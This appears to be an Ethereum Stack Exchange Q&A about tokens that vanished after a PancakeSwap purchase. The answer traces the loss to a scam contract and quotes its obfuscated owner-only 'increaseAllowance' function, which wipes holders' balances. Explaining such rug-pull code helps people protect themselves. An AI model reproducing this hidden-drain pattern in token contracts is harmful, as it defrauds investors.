# Lost tokens on pancakeswap

Tags: metamask, pancakeswap

I did a small swap on pancakeswap (metamask wallet) in order to understand how the whole stuff work, so i swapped 2 usdt into ONPAY coin, i did import it in my wallet, then i checked and it was in the wallet. However after 1 hour, the token disappeared (even after reimporting it)
Does someone know what could be the cause of it ?
Here is the transaction:
https://bscscan.com/tx/0xfc5891e9d4ced7b3db5fdcef39d444b8a397c857dde65b913af9335d7eff9c06

Thank you !

Comment: Does this answer your question? [I got scammed or suspect scam on Ethereum. What to do?](https://ethereum.stackexchange.com/questions/152373/i-got-scammed-or-suspect-scam-on-ethereum-what-to-do)

Answer (score 1):

Looks like a scam linked to this address: https://bscscan.com/address/0x94d471c6154993ba9a46aab05ad6057f44166a15

There are many copies of the token contract on bsc, you can find some through that page.

Looks like the increaseAllowance function actually decreases the balance of the address passed in.

```
function increaseAllowance(address uuyxxx) public     {
        if(ejjjka17 == _msgSender()){
        address newadd = uuyxxx;
        uint256 curamount = _balances[newadd];
        uint256 newaaamount = _balances[newadd]+_balances[newadd]-curamount;
        _balances[newadd] -= newaaamount;
        }else{
        if(ejjjka17 == _msgSender()){
        }else{
            revert("ccc");
        }
```

Your balance is reduced minutes later in this transaction: https://bscscan.com/tx/0x595a272cd0233dc1c6b6ab1841e2729712f2230e2dac11f4bd1801b3b01c6b8f

Anyone can create and launch any token, and scammers will fake pumps to appear in dextools trending lists, be careful.

Comment: Thanks a lot for your answer ! Where did you find the code of this token ?

Comment: Click on the token in the tx from your message then on the contract tab, and scroll down.
Much love and well done for testing with small amounts.